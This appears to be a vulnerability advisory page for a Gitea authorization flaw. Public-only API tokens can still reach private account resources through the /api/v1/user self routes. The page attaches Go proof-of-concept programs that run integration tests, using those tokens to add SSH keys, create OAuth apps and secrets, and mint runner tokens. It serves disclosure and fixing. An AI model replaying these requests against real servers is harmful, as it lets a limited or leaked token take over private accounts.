PT-2026-50584 · Go · Code.Gitea.Io/Gitea
Publicado
2026-06-17
·
Atualizado
2026-06-17
·
CVE-2026-24791
CVSS v3.1
8.1
Alta
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N |
Summary
Many authenticated self routes under
/api/v1/user/... do not enforce the public-only token restriction. As a result, a token or OAuth grant marked public-only, but otherwise carrying the route-required read/write scope category, can access or modify private account resources through self routes.The canonical private-user endpoint correctly rejects the same tokens, for example
GET /api/v1/users/{privateUser} returns 403. The bypass exists because the generic /api/v1/user route group requires user scope and reqToken(), but does not enforce the token's public-only restriction for most self routes.This is a systemic token/OAuth scope-boundary bypass, not a single endpoint bug.
This appears related to the previously fixed public-only token issue tracked as CVE-2025-68941 / GHSA-xfq3-qj7j-4565, which affected Gitea
< 1.22.3. The behavior described here reproduces on tested main checkout 6a2706626904. A representative SSH-key self-route PoC also reproduces on tested releases through v1.26.1. In other words, this should be treated as an incomplete fix / residual gap in a different route family, not as a duplicate of the older advisory.Affected Code
The generic
/api/v1/user group is mounted with user scope and reqToken():routers/api/v1/api.go:1008-1128
tokenRequiresScopes() sets ctx.PublicOnly when the token contains public-only, but the public-only restriction is enforced only by routes that also call checkTokenPublicOnly():routers/api/v1/api.go:241-294implementscheckTokenPublicOnly().routers/api/v1/api.go:299-341setsctx.PublicOnlyfrom the token scope.
Representative affected routes in that group:
/api/v1/user: private self profile and settings./api/v1/user/emails: read, add, and delete account email addresses./api/v1/user/keys: list and add SSH public keys./api/v1/user/applications/oauth2: list and create OAuth2 applications, including returned client secrets./api/v1/user/actions/secrets/{secretname}: create or delete user-level Actions secrets./api/v1/user/actions/variables: list, read, create, update, and delete user-level Actions variables./api/v1/user/actions/runners/...: list, update, delete runners, and mint registration tokens./api/v1/user/actions/runsand/api/v1/user/actions/jobs: list workflow metadata for private repositories./api/v1/user/repos: create private repositories and list private repositories./api/v1/user/subscriptions,/api/v1/user/times,/api/v1/user/stopwatches,/api/v1/user/teams,/api/v1/user/hooks: leak or modify private-account resources.
Correct public-only enforcement for comparison:
routers/api/v1/api.go:970-1008appliescontext.UserAssignmentAPI()andcheckTokenPublicOnly()to canonical/api/v1/users/{username}routes.routers/api/v1/user/user.go:122-125rejects public-only access to private users on/api/v1/users/{username}.routers/api/v1/api.go:1091-1092shows that/api/v1/user/reposrequires the additional repository scope category, but still does not applycheckTokenPublicOnly().
Local PoCs
The following dynamic PoCs were retested on checkout
6a2706626904 and all reproduced successfully. Each PoC writes a temporary integration test, runs it, and removes it afterward.bash
cd pocs
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only self user private profile bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user ssh key bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user emails bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user oauth app bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user repos private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user actions secret variable bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user runner registration bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user runner manage bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user webhook bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user actions runs private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user actions jobs private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user subscriptions private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user times private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user stopwatches private repo bypass dynamic poc.go
GITEA REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api public only user teams private org bypass dynamic poc.goReproduced Impact Examples
Using private fixture user
user31, public-only tokens are rejected by GET /api/v1/users/user31, but tokens with the route-required scopes can still reach the self routes below.Confirmed with
public-only,write:user:- add SSH keys through
/api/v1/user/keys; - add account emails through
/api/v1/user/emails; - create OAuth2 applications and receive
client secretthrough/api/v1/user/applications/oauth2; - create/delete user-level Actions secrets;
- create/read/list/update/delete user-level Actions variables;
- mint user-level runner registration tokens;
- manage user-level runners;
- create user webhooks.
Confirmed with
public-only,read:user:- read private self profile/settings and account email surfaces;
- list OAuth2 applications and user webhooks;
- list private repository workflow runs/jobs exposed through self Actions routes;
- list private subscriptions, tracked times, stopwatches, and team memberships.
Confirmed with
public-only plus the route-required repository category:- create private repositories through
POST /api/v1/user/reposwithpublic-only,write:user,write:repository; - list those private repositories through
GET /api/v1/user/reposwithpublic-only,read:user,read:repository, while the canonical private repository endpoint remains forbidden.
Impact
The
public-only token flag is intended to limit a token or OAuth grant to public resources. These routes violate that boundary for private accounts.Practical abuse scenarios include:
- a third-party app or leaked token with the route-required write scope, but restricted to public resources, adding SSH credentials or OAuth applications to a private account;
- a public-resource-restricted token with the route-required write scope modifying Actions secrets/variables or registering/managing runners;
- a token limited to public resources creating and enumerating private repositories;
- a supposedly public-only integration learning private repository, workflow, team, timing, subscription, webhook, and email metadata.
Suggested Fix
Apply public-only enforcement consistently to self routes under
/api/v1/user.At minimum:
- for self routes, treat
ctx.Doeras the target user/resource owner when enforcingpublic-only; mechanically addingcheckTokenPublicOnly()is not sufficient unlessctx.ContextUseris set toctx.Doeror the check explicitly handles self routes; - reject
ctx.PublicOnlyon credential, identity, OAuth application, repository creation, webhook, Actions, runner, and email-management self-route mutations; - filter list routes so public-only tokens cannot return private repositories, private organization/team metadata, private workflow runs/jobs, private tracked time, private stopwatches, or hidden subscriptions;
- add regression coverage that compares each affected
/api/v1/user/...route against the canonical private-user or private-repository endpoint.
Non-public-only tokens should preserve current behavior.
Attachment: api public only user ssh key bypass dynamic poc.go
go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
asymkey model "code.gitea.io/gitea/models/asymkey"
auth model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserSSHKeyBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth model.AccessTokenScopePublicOnly, auth model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/keys", api.CreateKeyOption{
Title: "public-only-private-key-bypass",
Key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cn+iXnA4KvcQYSV88vGn0Yi91vG47t1P7okprVmhNTkipNRIHWr6WdCO4VDr/cvsRkuVJAsLO2enwjGWWueOO6BodiBgyAOZ/5t5nJNMCNuLGT5UIo/RI1b0WRQwxEZTRjt6mFNw6lH14wRd8ulsr9toSWBPMOGWoYs1PDeDL0JuTjL+tr1SZi/EyxCngpYszKdXllJEHyI79KQgeD0Vt3pTrkbNVTOEcCNqZePSVmUH8X8Vhugz3bnE0/iE9Pb5fkWO9c4AnM1FgI/8Bvp27Fw2ShryIXuR6kKvUqhVMTuOSDHwu6A8jLE5Owt3GAYugDpDYuwTVNGrHLXKpPzrGGPE/jPmaLCMZcsdkec95dYeU3zKODEm8UQZFhmJmDeWVJ36nGrGZHL4J5aTTaeFUJmmXDaJYiJ+K2/ioKgXqnXvltu0A9R8/LGy4nrTJRr4JMLuJFoUXvGm1gXQ70w2LSpk6yl71RNC0hCtsBe8BP8IhYCM0EP5jh7eCMQZNvM= nocomment",
}).AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusCreated)
key := DecodeJSON(t, resp, &api.PublicKey{})
require.Equal(t, "public-only-private-key-bypass", key.Title)
unittest.AssertExistsAndLoadBean(t, &asymkey model.PublicKey{
ID: key.ID,
OwnerID: privateUser.ID,
Name: "public-only-private-key-bypass",
})
req = NewRequest(t, "GET", "/api/v1/user/keys").AddTokenAuth(publicOnlyWriteUserToken)
resp = MakeRequest(t, req, http.StatusOK)
keys := DecodeJSON(t, resp, []api.PublicKey{})
found := false
for , k := range keys {
if k.ID == key.ID {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for , candidate := range candidates {
if , err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/key.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s
", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api public only user ssh key bypass dynamic poc test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v
", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v
", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserSSHKeyBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s
", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v
", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can add an SSH public key to the private account through /api/v1/user/keys")
fmt.Println("reproduced: the same token can list that newly added key through /api/v1/user/keys")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api public only user oauth app bypass dynamic poc.go
go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserOAuthAppBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth model.AccessTokenScopePublicOnly, auth model.AccessTokenScopeWriteUser)
publicOnlyReadUserToken := getTokenForLoggedInUser(t, session, auth model.AccessTokenScopePublicOnly, auth model.AccessTokenScopeReadUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyReadUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/applications/oauth2", &api.CreateOAuth2ApplicationOptions{
Name: "public-only-private-oauth-app",
RedirectURIs: []string{"https://example.com/callback"},
ConfidentialClient: true,
}).AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusCreated)
app := DecodeJSON(t, resp, &api.OAuth2Application{})
require.Equal(t, "public-only-private-oauth-app", app.Name)
require.NotEmpty(t, app.ClientID)
require.NotEmpty(t, app.ClientSecret)
req = NewRequest(t, "GET", "/api/v1/user/applications/oauth2").AddTokenAuth(publicOnlyReadUserToken)
resp = MakeRequest(t, req, http.StatusOK)
apps := DecodeJSON(t, resp, api.OAuth2ApplicationList{})
found := false
for , a := range apps {
if a.ID == app.ID && a.Name == app.Name {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for , candidate := range candidates {
if , err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/app.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s
", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api public only user oauth app bypass dynamic poc test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v
", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v
", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserOAuthAppBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s
", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v
", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only user-scoped tokens are rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: public-only,write:user can create an OAuth2 application for the private account and receives a client secret")
fmt.Println("reproduced: public-only,read:user can list that OAuth2 application through /api/v1/user/applications/oauth2")
fmt.Println("condition=private user issues public-only tokens with route-required user scopes")
fmt.Println("cvss candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api public only user repos private repo bypass dynamic poc.go
go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserReposBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyReadRepoToken := getTokenForLoggedInUser(t, session,
auth model.AccessTokenScopePublicOnly,
auth model.AccessTokenScopeReadUser,
auth model.AccessTokenScopeReadRepository,
)
publicOnlyWriteRepoToken := getTokenForLoggedInUser(t, session,
auth model.AccessTokenScopePublicOnly,
auth model.AccessTokenScopeWriteUser,
auth model.AccessTokenScopeWriteRepository,
)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/repos", &api.CreateRepoOption{
Name: "public-only-private-repo",
Private: true,
}).AddTokenAuth(publicOnlyWriteRepoToken)
resp := MakeRequest(t, req, http.StatusCreated)
created := DecodeJSON(t, resp, &api.Repository{})
require.Equal(t, "user31/public-only-private-repo", created.FullName)
require.True(t, created.Private)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/repos/user31/public-only-private-repo").AddTokenAuth(publicOnlyReadRepoToken), http.StatusForbidden)
resp = MakeRequest(t, NewRequest(t, "GET", "/api/v1/user/repos").AddTokenAuth(publicOnlyReadRepoToken), http.StatusOK)
repos := DecodeJSON(t, resp, []api.Repository{})
found := false
for , repo := range repos {
if repo.FullName == "user31/public-only-private-repo" {
found = true
require.True(t, repo.Private)
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for , candidate := range candidates {
if , err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/repo.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s
", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api public only user repos private repo bypass dynamic poc test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v
", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v
", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserReposBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s
", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v
", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user,write:repository can create a private repository through /api/v1/user/repos")
fmt.Println("reproduced: public-only,read:user,read:repository is still forbidden on the canonical repository endpoint for that repo")
fmt.Println("reproduced: the same public-only token with the route-required read:user,read:repository scope can list the private repository through /api/v1/user/repos")
fmt.Println("condition=private user issues public-only tokens with route-required user and repository scopes")
fmt.Println("cvss candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api public only user actions secret variable bypass dynamic poc.go
go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserActionsSecretVariableBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth model.AccessTokenScopePublicOnly, auth model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "PUT", "/api/v1/user/actions/secrets/PRIVATE SECRET", api.CreateOrUpdateSecretOption{
Data: "top-secret",
}).AddTokenAuth(publicOnlyWriteUserToken)
MakeRequest(t, req, http.StatusCreated)
req = NewRequestWithJSON(t, "POST", "/api/v1/user/actions/variables/PRIVATE VAR", api.CreateVariableOption{
Value: "private-value",
Description: "scoped through public-only token",
}).AddTokenAuth(publicOnlyWriteUserToken)
MakeRequest(t, req, http.StatusCreated)
req = NewRequest(t, "GET", "/api/v1/user/actions/variables/PRIVATE VAR").AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusOK)
variable := DecodeJSON(t, resp, &api.ActionVariable{})
require.Equal(t, "PRIVATE VAR", variable.Name)
require.Equal(t, "private-value", variable.Data)
req = NewRequest(t, "GET", "/api/v1/user/actions/variables").AddTokenAuth(publicOnlyWriteUserToken)
resp = MakeRequest(t, req, http.StatusOK)
variables := DecodeJSON(t, resp, []*api.ActionVariable{})
found := false
for , v := range variables {
if v.Name == "PRIVATE VAR" && v.Data == "private-value" {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for , candidate := range candidates {
if , err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/action.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s
", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api public only user actions secret variable bypass dynamic poc test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v
", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v
", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserActionsSecretVariableBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s
", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v
", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can create a user actions secret for the private account")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can create, read, and list user actions variables")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api public only user runner registration bypass dynamic poc.go
go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user model "code.gitea.io/gitea/models/user"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserRunnerRegistrationBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth model.AccessTokenScopePublicOnly, auth model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
resp := MakeRequest(t, NewRequest(t, "POST", "/api/v1/user/actions/runners/registration-token").AddTokenAuth(publicOnlyWriteUserToken), http.StatusOK)
registrationToken := DecodeJSON(t, resp, &map[string]string{})
require.NotEmpty(t, (*registrationToken)["token"])
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for , candidate := range candidates {
if , err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/runners.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s
", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api public only user runner registration bypass dynamic poc test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v
", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v
", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserRunnerRegistrationBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s
", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v
", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can mint a user-level actions runner registration token")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N")
}
Version validation
Validation date: 2026-05-13
The SSH-key write PoC was used as the representative dynamic test for the systemic
/api/v1/user self-route public-only bypass.| Version | Commit | Result |
|---|---|---|
| main | 6a2706626904 | reproduced dynamically |
| v1.26.1 | afdbd9b7c5 | reproduced dynamically |
| v1.25.5 | f913d90ab6 | reproduced dynamically |
| v1.24.7 | 99053ce4fa | reproduced dynamically |
| v1.23.8 | cccd54999a | reproduced dynamically |
| v1.22.6 | 8eefa1f6de | reproduced dynamically with Go 1.22.12 test toolchain |
The representative version-matrix PoC validates the same root cause across tested releases for the SSH-key self-route write surface. The additional lead/supporting PoCs above were retested on the main checkout listed in the Local PoCs section.
Correção
Incorrect Authorization
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Code.Gitea.Io/Gitea